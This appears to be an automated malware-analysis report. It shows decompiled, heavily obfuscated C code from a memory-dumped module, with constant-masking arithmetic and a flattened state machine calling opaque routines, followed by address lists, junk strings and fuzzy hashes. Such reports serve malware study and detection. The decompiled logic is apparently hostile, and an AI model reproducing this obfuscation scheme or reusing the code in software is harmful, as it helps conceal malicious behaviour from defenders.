				_v180 = 0x1ebcdc;
				_v180 = _v180 * 0x14;
				_v180 = _v180 ^ 0x0266c130;
				_v400 = 0x77e211;
				_v400 = _v400 + 0xff09;
				_v400 = _v400 + 0x5d09;
				_v400 = _v400 ^ 0x55381529;
				_v400 = _v400 ^ 0x55412b0a;
				_v176 = 0x71c035;
				_v176 = _v176 | 0xfeda92a1;
				_v176 = _v176 ^ 0xfefbd2b5;
				_v108 = 0xfe0513;
				_v108 = _v108 ^ 0x3b42a56e;
				_v108 = _v108 ^ 0x3bbca07d;
				_v144 = 0x6d534a;
				_v144 = _v144 >> 9;
				_v144 = _v144 ^ 0x000036a9;
				_v212 = 0xd0d2a7;
				_v212 = _v212 + 0xffffe493;
				_v212 = _v212 << 3;
				_v212 = _v212 ^ 0x0685b9d0;
				_v268 = 0xf9698e;
				_v268 = _v268 >> 1;
				_v268 = _v268 >> 0xe;
				_v268 = _v268 ^ 0x00095223;
				_v300 = 0xeedb39;
				_v300 = _v300 >> 0x10;
				_v300 = _v300 >> 5;
				_v300 = _v300 ^ 0x000bf02b;
				_v368 = 0x6dcffd;
				_v368 = _v368 ^ 0xe423064b;
				_v368 = _v368 << 1;
				_v368 = _v368 >> 6;
				_v368 = _v368 ^ 0x0320b2df;
				_v156 = 0xdb4217;
				_v156 = _v156 + 0xfffffaf8;
				_v156 = _v156 ^ 0x00ddf309;
				_v148 = 0x20b4b8;
				_t824 = 0x21;
				_v148 = _v148 / _t824;
				_v148 = _v148 ^ 0x000e23a4;
				_v252 = 0x1d0bcb;
				_v252 = _v252 >> 1;
				_v252 = _v252 + 0xffff16d2;
				_v252 = _v252 ^ 0x00092634;
				_v360 = 0x11be17;
				_v360 = _v360 << 9;
				_t825 = 0x7a;
				_v360 = _v360 * 0x3e;
				_v360 = _v360 >> 2;
				_v360 = _v360 ^ 0x260194c9;
				_v260 = 0xbda336;
				_v260 = _v260 / _t825;
				_v260 = _v260 << 6;
				_v260 = _v260 ^ 0x006b0a34;
				_v336 = 0xcbaab4;
				_v336 = _v336 + 0xffff0a0a;
				_v336 = _v336 >> 0xe;
				_v336 = _v336 + 0x8dcf;
				_v336 = _v336 ^ 0x000cdba8;
				_v352 = 0x4b46ba;
				_v352 = _v352 >> 9;
				_v352 = _v352 >> 6;
				_v352 = _v352 + 0xffffe7a5;
				_v352 = _v352 ^ 0xfff90a84;
				_v244 = 0x2ade97;
				_t826 = 0x6a;
				_v244 = _v244 / _t826;
				_t827 = 0x2b;
				_v244 = _v244 / _t827;
				_v244 = _v244 ^ 0x0007229c;
				_v328 = 0xcf24be;
				_v328 = _v328 >> 2;
				_v328 = _v328 << 0xd;
				_v328 = _v328 >> 7;
				_v328 = _v328 ^ 0x00f5fbc7;
				_v228 = 0xb9e007;
				_v228 = _v228 * 0x74;
				_v228 = _v228 ^ 0x87377d50;
				_v228 = _v228 ^ 0xd30186ca;
				_v140 = 0x92e8c1;
				_v140 = _v140 + 0xbe61;
				_v140 = _v140 ^ 0x009b511b;
				_v320 = 0xb56f97;
				_v320 = _v320 << 4;
				_v320 = _v320 * 0x28;
				_v320 = _v320 + 0x4f1c;
				_v320 = _v320 ^ 0xc59f6d7c;
				_v220 = 0x8b8a36;
				_v220 = _v220 + 0xcd7d;
				_v220 = _v220 >> 8;
				_v220 = _v220 ^ 0x000f9932;
				_v132 = 0xb908b2;
				_v132 = _v132 ^ 0x70ba2531;
				_v132 = _v132 ^ 0x700d84a7;
				_v200 = 0x845e0e;
				_v200 = _v200 >> 5;
				_v200 = _v200 ^ 0x000945e8;
				_v232 = 0xe45f04;
				_v232 = _v232 + 0x52c9;
				_v232 = _v232 + 0x960a;
				_v232 = _v232 ^ 0x00e6f451;
				_v184 = 0x509651;
				_v184 = _v184 >> 0xd;
				_v184 = _v184 ^ 0x000a8365;
				_v324 = 0xb61c8e;
				_t828 = 0x58;
				_v324 = _v324 * 0x4b;
				_v324 = _v324 + 0xffffce31;
				_v324 = _v324 | 0xfffd86cc;
				_v324 = _v324 ^ 0xfff7c1ae;
				_v240 = 0x789212;
				_v240 = _v240 + 0x91e5;
				_v240 = _v240 << 6;
				_v240 = _v240 ^ 0x1e44e8b0;
				_v188 = 0x5edc64;
				_v188 = _v188 + 0x5f90;
				_v188 = _v188 ^ 0x0052133c;
				_v340 = 0x3d8faf;
				_v340 = _v340 << 9;
				_v340 = _v340 + 0x1422;
				_v340 = _v340 ^ 0x68bba279;
				_v340 = _v340 ^ 0x13a715ca;
				_v196 = 0xae738d;
				_v196 = _v196 << 6;
				_v196 = _v196 ^ 0x2b9fcf69;
				_v204 = 0xc0e247;
				_v204 = _v204 * 0x2a;
				_v204 = _v204 ^ 0x1faaa24e;
				_v408 = 0xf92d55;
				_v408 = _v408 / _t828;
				_v408 = _v408 ^ 0x285d2a2e;
				_t299 =  &_v408; // 0x285d2a2e
				_t829 = 0x19;
				_v408 =  *_t299 / _t829;
				_v408 = _v408 ^ 0x0199a962;
				_v356 = 0x86157c;
				_v356 = _v356 >> 9;
				_v356 = _v356 << 6;
				_v356 = _v356 << 5;
				_v356 = _v356 ^ 0x021dce54;
				_v296 = 0x13fd28;
				_t830 = 0x29;
				_v296 = _v296 * 0x3c;
				_v296 = _v296 / _t830;
				_v296 = _v296 ^ 0x001c7829;
				_v332 = 0x1849b9;
				_v332 = _v332 << 3;
				_v332 = _v332 | 0xd4e186cc;
				_v332 = _v332 + 0x5659;
				_v332 = _v332 ^ 0xd4e0329d;
				_v364 = 0x652325;
				_v364 = _v364 * 0x21;
				_v364 = _v364 * 0x7f;
				_v364 = _v364 * 0x74;
				_v364 = _v364 ^ 0x4075f579;
				_v308 = 0x1e04de;
				_v308 = _v308 | 0x097fe602;
				_v308 = _v308 >> 6;
				_t831 = 0x22;
				_v308 = _v308 / _t831;
				_v308 = _v308 ^ 0x00049ab9;
				_v372 = 0xdad5a9;
				_v372 = _v372 + 0x169e;
				_v372 = _v372 ^ 0x1933a8ee;
				_t832 = 0x27;
				_v372 = _v372 * 0x1b;
				_v372 = _v372 ^ 0xbb98a3d4;
				_v284 = 0x5abc08;
				_v284 = _v284 + 0x9c9b;
				_v284 = _v284 >> 6;
				_v284 = _v284 ^ 0x0006459b;
				_v392 = 0xe36def;
				_t375 =  &_v392; // 0xe36def
				_v392 =  *_t375 / _t832;
				_v392 = _v392 << 0xc;
				_t833 = 0x72;
				_v392 = _v392 / _t833;
				_v392 = _v392 ^ 0x00db2ed5;
				_v292 = 0x2bcdc1;
				_v292 = _v292 ^ 0xd0956a93;
				_t834 = 0x34;
				_v292 = _v292 / _t834;
				_v292 = _v292 ^ 0x040527b1;
				_v172 = 0x435f4d;
				_t403 =  &_v172; // 0x435f4d
				_t835 = 0x36;
				_v172 =  *_t403 * 0x32;
				_v172 = _v172 ^ 0x0d20eb2e;
				_v376 = 0x931f09;
				_v376 = _v376 >> 0xc;
				_v376 = _v376 + 0x277;
				_v376 = _v376 + 0xffff5497;
				_v376 = _v376 ^ 0xfff0e4ac;
				_v384 = 0xeb91ab;
				_v384 = _v384 / _t835;
				_v384 = _v384 << 9;
				_t836 = 0x47;
				_v384 = _v384 / _t836;
				_v384 = _v384 ^ 0x0016beb3;
				_v164 = 0x111ac1;
				_v164 = _v164 | 0x928bd923;
				_v164 = _v164 ^ 0x929c34e8;
				_v396 = 0x2958ee;
				_t439 =  &_v396; // 0x2958ee
				_t837 = 0x48;
				_v396 =  *_t439 / _t837;
				_v396 = _v396 ^ 0x016cfb0f;
				_v396 = _v396 * 0x71;
				_v396 = _v396 ^ 0xa0dd00d5;
				_v128 = 0xe08ce2;
				_t838 = 0x53;
				_v128 = _v128 / _t838;
				_v128 = _v128 ^ 0x000b0d73;
				_v208 = 0x2e8b0b;
				_v208 = _v208 ^ 0x5e673b9f;
				_v208 = _v208 ^ 0x5e4f386e;
				_v280 = 0x5ccabe;
				_v280 = _v280 << 4;
				_v280 = _v280 + 0xffffec50;
				_v280 = _v280 ^ 0x05c26b69;
				_v168 = 0xc1b244;
				_t839 = 0x5c;
				_v168 = _v168 * 0x42;
				_v168 = _v168 ^ 0x31e3a401;
				_v104 = 0x65d7e3;
				_v104 = _v104 | 0xb4704ceb;
				_v104 = _v104 ^ 0xb478b084;
				_v272 = 0xad45eb;
				_v272 = _v272 << 4;
				_v272 = _v272 + 0xd359;
				_v272 = _v272 ^ 0x0adf660d;
				_v348 = 0x6ed181;
				_v348 = _v348 / _t839;
				_v348 = _v348 >> 4;
				_v348 = _v348 ^ 0xe621744d;
				_v348 = _v348 ^ 0xe62576a4;
				_v216 = 0x2c2a1e;
				_t840 = 0x3b;
				_v216 = _v216 / _t840;
				_v216 = _v216 << 6;
				_v216 = _v216 ^ 0x00215120;
				_v152 = 0x62c9c0;
				_t841 = 0x6f;
				_v152 = _v152 / _t841;
				_v152 = _v152 ^ 0x000a326b;
				_v116 = 0x4f4e7b;
				_v116 = _v116 ^ 0x62ec5efd;
				_v116 = _v116 ^ 0x62a47d86;
				_v160 = 0x88d6d6;
				_v160 = _v160 + 0xffff117a;
				_v160 = _v160 ^ 0x0081d871;
				_v256 = 0x3e4062;
				_v256 = _v256 >> 1;
				_v256 = _v256 ^ 0x5f3d0e22;
				_v256 = _v256 ^ 0x5f2ceb1f;
				_v120 = 0x9bd99c;
				_v120 = _v120 << 1;
				_v120 = _v120 ^ 0x01364d92;
				_v124 = 0x71097e;
				_v124 = _v124 | 0x97b865cb;
				_v124 = _v124 ^ 0x97f558ee;
				_v316 = 0x448888;
				_v316 = _v316 + 0x9a25;
				_v316 = _v316 ^ 0x999cbd85;
				_v316 = _v316 * 0x4b;
				_v316 = _v316 ^ 0x12c1d02d;
				_v248 = 0x38125e;
				_v248 = _v248 * 0x26;
				_v248 = _v248 >> 5;
				_v248 = _v248 ^ 0x00476507;
				_v404 = 0x53b7d1;
				_v404 = _v404 * 0x51;
				_v404 = _v404 + 0xffffde94;
				_v404 = _v404 + 0x52d4;
				_v404 = _v404 ^ 0x1a7923b2;
				_t940 = 0x7a55d33;
				_v112 = 0x1ebef0;
				_v112 = _v112 + 0xffff371c;
				_v112 = _v112 ^ 0x001b8047;
				_v224 = 0x53493c;
				_v224 = _v224 + 0xffff9f18;
				_v224 = _v224 + 0xfffffeb0;
				_v224 = _v224 ^ 0x0056911c;
				_v264 = 0x9ccfeb;
				_v264 = _v264 + 0xcfa3;
				_v264 = _v264 ^ 0x707f8213;
				_v264 = _v264 ^ 0x70e6408b;
				_v192 = 0x60d401;
				_v192 = _v192 ^ 0x6b21a926;
				_v192 = _v192 ^ 0x6b40ee12;
				_v136 = 0xf994b0;
				_v136 = _v136 + 0xd953;
				_v136 = _v136 ^ 0x00f766a1;
				_v304 = 0x1ffe30;
				_v304 = _v304 + 0xffff9912;
				_v304 = _v304 + 0x2a2b;
				_v304 = _v304 + 0xffff9847;
				_v304 = _v304 ^ 0x00183e04;
				_v312 = 0x7be551;
				_v312 = _v312 << 0xe;
				_v312 = _v312 + 0xabf1;
				_v312 = _v312 | 0xc59b45fe;
				_v312 = _v312 ^ 0xfdd7198d;
				while(1) {
					L1:
					while(1) {
						_t917 = 0xaa14017;
						do {
							while(1) {
								L3:
								_t952 = _t815 - 0x50630cd;
								if(_t952 > 0) {
									break;
								}
								if(_t952 == 0) {
									_t815 = 0x5e6f35e;
									continue;
								} else {
									if(_t815 == 0x7f08) {
										E1000C1CB(_v304, _v96, _v212, _v312);
									} else {
										if(_t815 == _t849) {
											E10011D4A(_v324, _v100, _v388, _v240);
											_t815 =  ==  ? _t940 : 0x2726f1c;
											goto L14;
										} else {
											if(_t815 == 0x4beebc) {
												_push(_v280);
												_t638 =  &_v208; // 0x5e4f386e
												_push( *_t638);
												_push(_v128);
												E1001030B( *_t938, _v96, _v168,  &_v92,  *((intOrPtr*)(_t938 + 4)), _v104, E1000416C(_v396, 0x10001080), _v272, _v348, _v216, _v176);
												_t815 =  ==  ? 0xaa14017 : 0x2726f1c;
												E1000B952(_v152, _t803, _v116, _v160);
												_t945 = _t945 + 0x3c;
												L33:
												_t940 = 0x7a55d33;
												_t849 = 0x13a4c4;
												_t917 = 0xaa14017;
												goto L34;
											} else {
												if(_t815 == 0x1229260) {
													E1000C7F0(_v84, _v316, _v248, _v404, _v112);
													_t945 = _t945 + 0xc;
													_t815 = 0xef219f7;
													goto L14;
												} else {
													if(_t815 == 0x2726f1c) {
														E1001193B(_v192, _v136, _v100);
														_t815 = 0x7f08;
														L13:
														L14:
														_t797 = 0xfb6e3ef;
														L15:
														_t849 = 0x13a4c4;
														_t917 = 0xaa14017;
														continue;
													} else {
														if(_t815 != 0x4aa3e41) {
															goto L34;
														} else {
															_v88 = 0x100;
															E10008A21(_v200, _v232, _v96, 0x100,  &_v100, _v184, _v276);
															_t945 = _t945 + 0x14;
															_t849 = 0x13a4c4;
															_t815 =  ==  ? 0x13a4c4 : 0x7f08;
															goto L1;
														}
													}
												}
											}
										}
									}
								}
								L37:
								return _t944;
							}
							if(_t815 == 0x5e6f35e) {
								_push(_v156);
								_push(_v368);
								_push(_v300);
								_t780 = E1000416C(_v268, 0x100010f0);
								_push(_v260);
								_push(_v360);
								_push(_v252);
								E1001E1AC(_v336,  &_v96, _v344, _t780, _v352, _v244, E1000416C(_v148, 0x10001040));
								_t815 =  ==  ? 0x4aa3e41 : 0xe31638a;
								E1000B952(_v328, _t780, _v228, _v140);
								E1000B952(_v320, _t781, _v220, _v132);
								_t938 = _v80;
								_t945 = _t945 + 0x3c;
								goto L33;
							} else {
								if(_t815 == _t940) {
									_t670 =  &_v204; // 0x5e4f386e
									_push( *_t670);
									_push(_v196);
									_push(_v340);
									_t942 = E1000416C(_v188, 0x10001080);
									_t789 = 0x48;
									_v88 = _t789;
									_t791 = E10002550(_v408,  &_v88, _t788, _v100,  &_v76, _v180, _v356, _t789, _v296, _v332, _v188, _v364, _v308, _v372);
									_t945 = _t945 + 0x3c;
									if(_t791 != _v400) {
										_t815 = 0x2726f1c;
									} else {
										_push(_v172);
										_push( &_v68);
										_push(_v292);
										_push(_v392);
										_push(_v284);
										_t855 = 0x40;
										E100168F4(_t855,  *0x10025218 + 8);
										_t945 = _t945 + 0x14;
										_t815 = 0x4beebc;
									}
									E1000B952(_v376, _t942, _v384, _v164);
									goto L33;
								} else {
									if(_t815 == _t917) {
										E1001A665(_v256, _v120, _v92,  &_v84, _v144, _v100, _v124);
										_t945 = _t945 + 0x14;
										_t797 = 0xfb6e3ef;
										_t815 =  ==  ? 0xfb6e3ef : 0xef219f7;
										goto L15;
									} else {
										if(_t815 == 0xef219f7) {
											E1001193B(_v224, _v264, _v92);
											_t815 = 0x2726f1c;
											goto L13;
										} else {
											if(_t815 != _t797) {
												goto L34;
											} else {
												E10002C79(_v84);
												_t815 = 0x1229260;
												_t944 =  !=  ? 1 : _t944;
												goto L14;
											}
										}
									}
								}
							}
							goto L37;
							L34:
						} while (_t815 != 0xe31638a);
						goto L37;
					}
				}
			}

0x1000e179
0x1000e17b
0x1000e182
0x1000e18c
0x1000e194
0x1000e19c
0x1000e1a4
0x1000e1ac
0x1000e1b7
0x1000e1bf
0x1000e1c7
0x1000e1d2
0x1000e1dd
0x1000e1e8
0x1000e1f0
0x1000e1fb
0x1000e20e
0x1000e215
0x1000e220
0x1000e222
0x1000e22d
0x1000e232
0x1000e23a
0x1000e245
0x1000e24a
0x1000e250
0x1000e255
0x1000e25d
0x1000e265
0x1000e26e
0x1000e271
0x1000e275
0x1000e27d
0x1000e285
0x1000e298
0x1000e29f
0x1000e2aa
0x1000e2b2
0x1000e2ba
0x1000e2c2
0x1000e2ca
0x1000e2d2
0x1000e2dd
0x1000e2e8
0x1000e2f3
0x1000e2fe
0x1000e309
0x1000e314
0x1000e31f
0x1000e327
0x1000e332
0x1000e33d
0x1000e348
0x1000e350
0x1000e35b
0x1000e366
0x1000e36d
0x1000e375
0x1000e380
0x1000e38b
0x1000e393
0x1000e39b
0x1000e3a6
0x1000e3ae
0x1000e3b6
0x1000e3ba
0x1000e3bf
0x1000e3c7
0x1000e3d4
0x1000e3df
0x1000e3ea
0x1000e3fe
0x1000e403
0x1000e40c
0x1000e417
0x1000e422
0x1000e429
0x1000e434
0x1000e43f
0x1000e447
0x1000e451
0x1000e454
0x1000e458
0x1000e45d
0x1000e465
0x1000e47b
0x1000e482
0x1000e48a
0x1000e495
0x1000e49d
0x1000e4a5
0x1000e4aa
0x1000e4b2
0x1000e4ba
0x1000e4c2
0x1000e4c7
0x1000e4cc
0x1000e4d4
0x1000e4dc
0x1000e4ee
0x1000e4f3
0x1000e503
0x1000e506
0x1000e50d
0x1000e518
0x1000e520
0x1000e525
0x1000e52a
0x1000e52f
0x1000e537
0x1000e54a
0x1000e551
0x1000e55c
0x1000e567
0x1000e572
0x1000e57d
0x1000e588
0x1000e590
0x1000e59a
0x1000e59e
0x1000e5a6
0x1000e5ae
0x1000e5b9
0x1000e5c4
0x1000e5cc
0x1000e5d7
0x1000e5e2
0x1000e5ed
0x1000e5f8
0x1000e603
0x1000e60d
0x1000e618
0x1000e623
0x1000e62e
0x1000e639
0x1000e644
0x1000e64f
0x1000e657
0x1000e662
0x1000e671
0x1000e674
0x1000e678
0x1000e680
0x1000e688
0x1000e690
0x1000e69b
0x1000e6a6
0x1000e6ae
0x1000e6b9
0x1000e6c4
0x1000e6cf
0x1000e6da
0x1000e6e2
0x1000e6e7
0x1000e6ef
0x1000e6f7
0x1000e6ff
0x1000e70a
0x1000e712
0x1000e71d
0x1000e730
0x1000e737
0x1000e742
0x1000e752
0x1000e756
0x1000e75e
0x1000e762
0x1000e767
0x1000e76d
0x1000e775
0x1000e77d
0x1000e782
0x1000e787
0x1000e78c
0x1000e794
0x1000e7a7
0x1000e7a8
0x1000e7b8
0x1000e7bf
0x1000e7ca
0x1000e7d2
0x1000e7d7
0x1000e7df
0x1000e7e7
0x1000e7ef
0x1000e7fc
0x1000e805
0x1000e80e
0x1000e812
0x1000e81a
0x1000e822
0x1000e82a
0x1000e837
0x1000e83c
0x1000e842
0x1000e84a
0x1000e852
0x1000e85a
0x1000e867
0x1000e86a
0x1000e86e
0x1000e876
0x1000e881
0x1000e88c
0x1000e894
0x1000e89f
0x1000e8a7
0x1000e8af
0x1000e8b3
0x1000e8bc
0x1000e8c1
0x1000e8c7
0x1000e8cf
0x1000e8da
0x1000e8ec
0x1000e8f1
0x1000e8fa
0x1000e905
0x1000e910
0x1000e918
0x1000e91b
0x1000e922
0x1000e92d
0x1000e935
0x1000e93a
0x1000e942
0x1000e94a
0x1000e952
0x1000e962
0x1000e966
0x1000e96f
0x1000e974
0x1000e97a
0x1000e982
0x1000e98d
0x1000e998
0x1000e9a3
0x1000e9ab
0x1000e9af
0x1000e9b2
0x1000e9b6
0x1000e9c3
0x1000e9c7
0x1000e9d1
0x1000e9e5
0x1000e9ea
0x1000e9f3
0x1000e9fe
0x1000ea09
0x1000ea14
0x1000ea1f
0x1000ea2a
0x1000ea32
0x1000ea3d
0x1000ea48
0x1000ea5b
0x1000ea5e
0x1000ea65
0x1000ea70
0x1000ea7b
0x1000ea86
0x1000ea91
0x1000ea9c
0x1000eaa4
0x1000eaaf
0x1000eaba
0x1000eaca
0x1000eace
0x1000ead3
0x1000eadb
0x1000eae3
0x1000eaf5
0x1000eafa
0x1000eb03
0x1000eb0b
0x1000eb16
0x1000eb28
0x1000eb2b
0x1000eb32
0x1000eb3d
0x1000eb48
0x1000eb53
0x1000eb5e
0x1000eb69
0x1000eb74
0x1000eb7f
0x1000eb8a
0x1000eb91
0x1000eb9c
0x1000eba7
0x1000ebb2
0x1000ebb9
0x1000ebc4
0x1000ebcf
0x1000ebda
0x1000ebe5
0x1000ebed
0x1000ebf5
0x1000ec02
0x1000ec06
0x1000ec0e
0x1000ec21
0x1000ec28
0x1000ec30
0x1000ec3b
0x1000ec48
0x1000ec4c
0x1000ec54
0x1000ec61
0x1000ec69
0x1000ec6e
0x1000ec79
0x1000ec84
0x1000ec8f
0x1000ec9a
0x1000eca5
0x1000ecb0
0x1000ecbb
0x1000ecc6
0x1000ecd1
0x1000ecdc
0x1000ece7
0x1000ecf2
0x1000ecfd
0x1000ed08
0x1000ed13
0x1000ed1e
0x1000ed29
0x1000ed31
0x1000ed39
0x1000ed41
0x1000ed49
0x1000ed51
0x1000ed59
0x1000ed5e
0x1000ed66
0x1000ed6e
0x1000ed76
0x1000ed76
0x1000ed7b
0x1000ed7b
0x1000ed80
0x1000ed80
0x1000ed80
0x1000ed80
0x1000ed86
0x00000000
0x00000000
0x1000ed8c
0x1000ef61
0x00000000
0x1000ed92
0x1000ed98
0x1000f203
0x1000ed9e
0x1000eda0
0x1000ef45
0x1000ef59
0x00000000
0x1000eda6
0x1000edac
0x1000ee8a
0x1000ee96
0x1000ee96
0x1000ee9d
0x1000eeee
0x1000ef1f
0x1000ef22
0x1000ef27
0x1000f1c8
0x1000f1c8
0x1000f1d2
0x1000f1d7
0x00000000
0x1000edb2
0x1000edb8
0x1000ee7b
0x1000ee80
0x1000ee83
0x00000000
0x1000edbe
0x1000edc4
0x1000ee44
0x1000ee49
0x1000ee4e
0x1000ee4f
0x1000ee4f
0x1000ee54
0x1000ee54
0x1000ed7b
0x00000000
0x1000edc6
0x1000edcc
0x00000000
0x1000edd2
0x1000edfc
0x1000ee0a
0x1000ee11
0x1000ee22
0x1000ee27
0x00000000
0x1000ee27
0x1000edcc
0x1000edc4
0x1000edb8
0x1000edac
0x1000eda0
0x1000ed98
0x1000f20c
0x1000f216
0x1000f216
0x1000ef71
0x1000f100
0x1000f10c
0x1000f110
0x1000f11e
0x1000f12d
0x1000f134
0x1000f138
0x1000f16c
0x1000f192
0x1000f1a0
0x1000f1b9
0x1000f1be
0x1000f1c5
0x00000000
0x1000ef77
0x1000ef79
0x1000f023
0x1000f023
0x1000f02f
0x1000f036
0x1000f050
0x1000f054
0x1000f059
0x1000f094
0x1000f099
0x1000f0a0
0x1000f0de
0x1000f0a2
0x1000f0a2
0x1000f0b0
0x1000f0b1
0x1000f0b8
0x1000f0bc
0x1000f0cb
0x1000f0cf
0x1000f0d4
0x1000f0d7
0x1000f0d7
0x1000f0f4
0x00000000
0x1000ef7f
0x1000ef81
0x1000f007
0x1000f00c
0x1000f016
0x1000f01b
0x00000000
0x1000ef83
0x1000ef89
0x1000efc6
0x1000efcb
0x00000000
0x1000ef8b
0x1000ef8d
0x00000000
0x1000ef93
0x1000ef9a
0x1000efa1
0x1000efa9
0x00000000
0x1000efa9
0x1000ef8d
0x1000ef89
0x1000ef81
0x1000ef79
0x00000000
0x1000f1dc
0x1000f1dc
0x00000000
0x1000f1e8
0x1000ed7b

Strings

m, xrefs: 1000E8A7
JSm, xrefs: 1000E314
<IS, xrefs: 1000EC8F
+*, xrefs: 1000ED39
k2, xrefs: 1000EB32
n8O^, xrefs: 1000EE96
.*](, xrefs: 1000E75E
X), xrefs: 1000E9AB
+AU, xrefs: 1000E2CA
Z<, xrefs: 1000E275
4&, xrefs: 1000E434
#R, xrefs: 1000E375
YV, xrefs: 1000E7DF
~q, xrefs: 1000EBC4
{NO, xrefs: 1000EB3D
Mt!, xrefs: 1000EAD3
Q{, xrefs: 1000ED51
b@>, xrefs: 1000EB7F
E, xrefs: 1000E60D
M_C, xrefs: 1000E910
%#e, xrefs: 1000E7EF
Q!, xrefs: 1000EB0B

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: +AU$ Q!$#R$%#e$+*$.*]($4&$<IS$JSm$M_C$Mt!$Q{$YV$Z<$b@>$k2$n8O^${NO$~q$E$X)$m
API String ID: 0-984612047
Opcode ID: fac6ad842fae6a86e202042147060335504eb7bfb7627482c49f5dac1be27316
Instruction ID: 26cb77e09090ad283015bb820bd1f8631441e9f22475660cd2c075041840670b
Opcode Fuzzy Hash: fac6ad842fae6a86e202042147060335504eb7bfb7627482c49f5dac1be27316
Instruction Fuzzy Hash: F982FF71508381DFE379CF21C98AA9FBBE2FBC5344F10891DE69986260D7B19849CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10002C79, Relevance: 25.7, Strings: 20, Instructions: 744
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10002C79(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char* _v60;
				intOrPtr _v64;
				signed int _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				char _v92;
				char _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				unsigned int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				unsigned int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				void* _t893;
				void* _t896;
				intOrPtr _t910;
				intOrPtr _t917;
				void* _t918;
				signed int _t920;
				void* _t936;
				void* _t938;
				signed int _t944;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				signed int _t952;
				signed int _t953;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				void* _t957;
				void* _t1027;
				signed int _t1047;
				signed int _t1048;
				void* _t1049;
				intOrPtr _t1050;
				signed int _t1052;
				signed int _t1053;
				void* _t1054;
				void* _t1059;
				signed int* _t1061;
				void* _t1066;

				_t1061 =  &_v456;
				_v56 = 0x6a696e;
				_v52 = 0x7c560e;
				_t1059 = 0;
				_v84 = __ecx;
				_v48 = _v48 & 0;
				_t938 = 0x5a81e65;
				_v144 = 0x56614;
				_v144 = _v144 | 0xb237c5ff;
				_v144 = _v144 ^ 0xff75a3b4;
				_v216 = 0xee0104;
				_t944 = 0x1f;
				_v216 = _v216 / _t944;
				_v216 = _v216 ^ 0x0007ad72;
				_v388 = 0x9054d6;
				_v388 = _v388 + 0xffff2e41;
				_t945 = 0x6c;
				_v388 = _v388 * 0x4c;
				_v388 = _v388 << 6;
				_v388 = _v388 ^ 0xa6bab500;
				_v368 = 0xe3eb3b;
				_v368 = _v368 + 0xffff4e4b;
				_v368 = _v368 >> 0xb;
				_v368 = _v368 + 0xffff86d1;
				_v368 = _v368 ^ 0xffffa338;
				_v360 = 0xcee0d2;
				_v360 = _v360 + 0xffffca50;
				_v360 = _v360 ^ 0x039008f0;
				_v360 = _v360 ^ 0xcbc11aeb;
				_v360 = _v360 ^ 0xc89fb939;
				_v268 = 0xff021e;
				_v268 = _v268 << 8;
				_v268 = _v268 ^ 0xa13512d5;
				_v268 = _v268 ^ 0x5e370cd5;
				_v152 = 0xe62712;
				_v152 = _v152 << 0x10;
				_v152 = _v152 ^ 0x27120000;
				_v224 = 0xa2eb06;
				_v224 = _v224 ^ 0x59c1afa9;
				_v224 = _v224 ^ 0x596344af;
				_v212 = 0x96cacc;
				_v212 = _v212 * 0x2b;
				_v212 = _v212 ^ 0x19541044;
				_v356 = 0xb7ab75;
				_v356 = _v356 * 0x58;
				_v356 = _v356 + 0x1b61;
				_v356 = _v356 >> 0xb;
				_v356 = _v356 ^ 0x0007e461;
				_v436 = 0x9a08fe;
				_v436 = _v436 >> 7;
				_v436 = _v436 >> 0xa;
				_v436 = _v436 + 0xffffef16;
				_v436 = _v436 ^ 0xffffef63;
				_v132 = 0x139878;
				_v132 = _v132 / _t945;
				_v132 = _v132 ^ 0x00002e72;
				_v396 = 0xd1668f;
				_v396 = _v396 ^ 0x17cda90d;
				_v396 = _v396 | 0x533c8e3a;
				_v396 = _v396 << 4;
				_v396 = _v396 ^ 0x73ccfb80;
				_v400 = 0xb2ad84;
				_v400 = _v400 << 9;
				_v400 = _v400 + 0xffff473c;
				_v400 = _v400 ^ 0xa2ebbe85;
				_v400 = _v400 ^ 0xc7bfe933;
				_v180 = 0xb9ee50;
				_v180 = _v180 + 0xe82f;
				_v180 = _v180 ^ 0x00b8451a;
				_v272 = 0x3ec2bd;
				_v272 = _v272 << 0xc;
				_v272 = _v272 << 0xe;
				_v272 = _v272 ^ 0xf40b9830;
				_v280 = 0xa1d825;
				_v280 = _v280 | 0xfd9b7559;
				_v280 = _v280 >> 9;
				_v280 = _v280 ^ 0x007668c1;
				_v264 = 0xba511f;
				_v264 = _v264 | 0xc4e7c815;
